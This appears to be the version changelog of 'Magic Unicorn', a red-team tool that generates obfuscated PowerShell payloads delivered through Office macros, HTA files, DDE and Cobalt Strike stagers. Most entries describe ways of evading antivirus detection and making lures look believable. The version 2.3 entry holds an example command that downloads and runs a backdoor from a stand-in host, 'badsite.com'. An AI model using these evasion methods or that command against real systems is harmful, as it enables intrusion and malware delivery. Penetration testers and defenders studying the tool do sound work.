~~~~~~~~~~~~~~~~
version 3.1
~~~~~~~~~~~~~~~~

* added secondary parse for older versions of cobalt strike
* added better error handling around list index out of range
* modified lower stack size due to powershell crashing sometimes, seems to be more stable now

~~~~~~~~~~~~~~~~
version 3.0
~~~~~~~~~~~~~~~~

* added ability to import cobalt strike C# stager and use that as a unicorn based attack
* added ability to import any shellcode directly into unicorn
* remove cmd.exe depend on WSCRIPT.Shell - not needed and increases cmd line length limit
* added ability to use custom shellcode with cobalt strike and shellcode methods for hta
* added ability to use custom shellcode with cobalt strike and shellcode methods for macro
* fixed line continuation error for long payloads when using excel (can't have long strings with & plus 25)
* add hiding of powershell name in hta file

~~~~~~~~~~~~~~~~
version 2.14
~~~~~~~~~~~~~~~~

* fix replace for /C that broke syntax for macros

~~~~~~~~~~~~~~~~
version 2.13
~~~~~~~~~~~~~~~~

* added switches on command lines for evasion

~~~~~~~~~~~~~~~~
version 2.12
~~~~~~~~~~~~~~~~

* added better handling for stack size detection on signatures - should no longer get flagged

~~~~~~~~~~~~~~~~
version 2.11
~~~~~~~~~~~~~~~~

* reduce filesize by removing shikata from encoding on payload generation
* add lenght limit size description on error on size

~~~~~~~~~~~~~~~~
version 2.10
~~~~~~~~~~~~~~~~

* added IEX and formula evasion as DDE methods and split out attack vector into 3 different components
* rewrote the download/exec payload so that it is custom shellcode that is manually patched with URL instead of metasploit one
* numerous other enhancements and fixes

~~~~~~~~~~~~~~~~
version 2.9.3
~~~~~~~~~~~~~~~~

* add better obfsucation on dde

~~~~~~~~~~~~~~~~
version 2.9.2
~~~~~~~~~~~~~~~~

* fix compatibility with windows 7 - for some reason -e''c in Windows 7 breaks Unicorn whereas works fine within Windows 10

~~~~~~~~~~~~~~~~
version 2.9.1
~~~~~~~~~~~~~~~~

* fix typo in powershell_command
* added better obfsucation of path and code (thanks Will)

~~~~~~~~~~~~~~~~
version 2.9
~~~~~~~~~~~~~~~~

* added a sys.exit() on length amount
* added new dde code exec through unicorn from sensepost
* fixed some wording in help menu
* general code cleanup
* slimmed down command line some more with seperator reduction and variable name size length

~~~~~~~~~~~~~~~~
version 2.8.2
~~~~~~~~~~~~~~~~

* added better handling of randomized variable names
* removed an extra semicolon
* fixed typo
* added count length for payload to ensure payload doesn't increase past max command line length of 8191
* fixed minor casing on Start-Sleep

~~~~~~~~~~~~~~~~
version 2.8.1
~~~~~~~~~~~~~~~~

* remove static variables - flagged by A/V

~~~~~~~~~~~~~~~~
version 2.8
~~~~~~~~~~~~~~~~

* shortens length and obfuscation of unicorn command
* removed direct -ec from powershell command

~~~~~~~~~~~~~~~~
version 2.7.5
~~~~~~~~~~~~~~~~

* fix missing powershell call (thanks matterpreter)
* improved additional wording on error message for macros

~~~~~~~~~~~~~~~~
version 2.7.4
~~~~~~~~~~~~~~~~

* add a more real corrupt message from excel macro injection

~~~~~~~~~~~~~~~~
version 2.7.3
~~~~~~~~~~~~~~~~

* fixed powershell injection obfuscation in macro injection - that was a pain :P
* added bolt red to macro AutoOpen/Auto_Open difference based on version number
* fixed powershell injection length issues by skimming down the chunking of powershell commands

~~~~~~~~~~~~~~~~
verison 2.7.2
~~~~~~~~~~~~~~~~

* random cleanup

~~~~~~~~~~~~~~~~
version 2.7.1
~~~~~~~~~~~~~~~~

* fixed merge issue

~~~~~~~~~~~~~~~~
version 2.7
~~~~~~~~~~~~~~~~

* added description to macro attack for AutoOpen/Auto_Open()
* added obfuscation for actual base64 encoded strings
* added better randomization on variable names

~~~~~~~~~~~~~~~~
version 2.6
~~~~~~~~~~~~~~~~

* fixed an issue when generating hta if a folder was there it would not remove properly and overwrite
* fixed a bug introduced by new obfuscation on proper escaping of quotes
* added new obfuscation around HTA, variable names and split up shell commands to evade detection
* improved code base for HTA attack vector and reliability

~~~~~~~~~~~~~~~~
version 2.5.1
~~~~~~~~~~~~~~~~

* minor string format cleanup
* pep8 formatting

~~~~~~~~~~~~~~~~
version 2.5
~~~~~~~~~~~~~~~~

* complete rehaul on macro injection - adds heavy obfsucation through the entire codebase
* changed generate_random_strings to remove any digits - this was due to macro strings not supporting numeric values.startswith()
* code improvements and efficiency in vba code

~~~~~~~~~~~~~~~~
version 2.4.3
~~~~~~~~~~~~~~~~

* fixed macro injection with new obfuscated method
* added noprofile to command when using macro injection
* changed AutoOpen to Auto_Open
* fixed instructions to reflect

~~~~~~~~~~~~~~~~
version 2.4.2
~~~~~~~~~~~~~~~~

* added shortened version of -window hidden to -w 1 which is shorthand for window hidden

~~~~~~~~~~~~~~~~
version 2.4.1
~~~~~~~~~~~~~~~~

* added shortened method for obfsucation

~~~~~~~~~~~~~~~~
version 2.4
~~~~~~~~~~~~~~~~

* added better handling if msf or shellcode didn't get formatted properly
* added a new technique for obfsucation that should not get picked up anymore and removes the need for -e or -ec

~~~~~~~~~~~~~~~~
version 2.3.5
~~~~~~~~~~~~~~~~

* added better evasion on encodedcommand

~~~~~~~~~~~~~~~~
version 2.3.4
~~~~~~~~~~~~~~~~

* added decoded base64 -encodedcommand for better av evasion

~~~~~~~~~~~~~~~~
version 2.3.3
~~~~~~~~~~~~~~~~

* most AVs were flagging on -enc instead of -EncodedCommand along with base64 would flag windows defender.. looks like this gets around it on both macro and standard ps1/encoded command params.

~~~~~~~~~~~~~~~~
version 2.3.2
~~~~~~~~~~~~~~~~

* change auto_open to autopen() - thanks @JAshton

~~~~~~~~~~~~~~~~
version 2.3.1
~~~~~~~~~~~~~~~~

* fix indent issue

~~~~~~~~~~~~~~~~
version 2.3
~~~~~~~~~~~~~~~~

* added support for windows/download_exec as a payload option - just run python unicorn.py windows/download_exec exe=exename.exe url=http://badsite.com/backdoor.exe - note it doesn't need to be an exe, whatever you want to download and execute
* fixes an issue that caused macro injection to not properly work (duplicate powershell command)

~~~~~~~~~~~~~~~~
version 2.2
~~~~~~~~~~~~~~~~

* pep8 formatting
* python3 conversion
* added randomized variables (not fully completed yet but its better than before) - AV picking up on variables and base64 encoded strings

~~~~~~~~~~~~~~~~
version 2.1.2
~~~~~~~~~~~~~~~~

* added enablestageencoding to true by default

~~~~~~~~~~~~~~~~
version 2.1.1
~~~~~~~~~~~~~~~~

* added --smallest flag to msfvenom generate which compacts shellcode to smaller size

~~~~~~~~~~~~~~~~
version 2.1
~~~~~~~~~~~~~~~~

* added ability to import your own powershell into attacks (thanks to curi0usJack pull request)
* fixed an issue when generating macro attack with appropriate spacing on macros

~~~~~~~~~~~~~~~~
version 2.0
~~~~~~~~~~~~~~~~

* added brand new hta attack vector for direct web application compromise (thanks Justin Elze)
* added brand new attack binary to cert (thanks Matthew Graeber)
* added window.close(); after script

~~~~~~~~~~~~~~~~
version 1.3
~~~~~~~~~~~~~~~~

* slimmed down powershell injection code even more
* when using windows/meterpreter/reverse_https, the option flags StagerURILength=5 StagerVerifySSLCert=false are specified in order to trim down payload. This is due to char restriction sizes when pasting into a command window. With these two settings, the codebase is slimmed down significantly and fits within the normal length 
* added support for shikata ga nai to obfuscate shellcode prior to utf and b64encoding. Will now through off sigs if contained inside of a file.

~~~~~~~~~~~~~~~~
version 1.2
~~~~~~~~~~~~~~~~

* fixed an issue where powershell injection may not work on 32 bit platforms
* shaved command line argument down around 32 bytes

~~~~~~~~~~~~~~~~
version 1.1
~~~~~~~~~~~~~~~~

* fixed autoopen from not working on some office implementations - now works on all office documents including powerpoint/word/excel
* changed the open description to fix a typo and also make it more believable 
* fixed spacing issues when generating macro attack
* added instructions on when using macro on how to add the macro to an office document
* added better description and instructions for powershell injection
* added better description on initial loading of payload

~~~~~~~~~~~~~~~~
version 1.0
~~~~~~~~~~~~~~~~

* incorporated new macro attack from Rik van Duijn RCX @rikduijn
* code cleanup and fixed an issue that would not present argument values when not formatted properly
* channeled stderr to subprocess.PIPE
* slimmed unicorn powershell injection code about 17 bytes to compact powershell injection

~~~~~~~~~~~~~~~~
version 0.5
~~~~~~~~~~~~~~~~

* fixed hidden window command when using powershell injection

~~~~~~~~~~~~~~~~
version 0.4
~~~~~~~~~~~~~~~~

* shortened powershell injection code by removing un-used code and shortening initial command names
* removed EnableStageEncoding - after testing extensively, this can produce unreliable results. 
* fixed a bug that caused unicorn to not work properly due to changes with MSFVenom
* slimmed encoded powershell command, removed un-used else statement

~~~~~~~~~~~~~~~~
version 0.3
~~~~~~~~~~~~~~~~

* updated msfvenom to include format type and architecture to remove bug it would not generate appropriate shellcode

~~~~~~~~~~~~~~~~
version 0.2
~~~~~~~~~~~~~~~~

* changed output name
* added appropriate licensing
* slimmed the powershell code and added noprofile to downgrade process

~~~~~~~~~~~~~~~~
version 0.1
~~~~~~~~~~~~~~~~

* initial release of magic unicorn
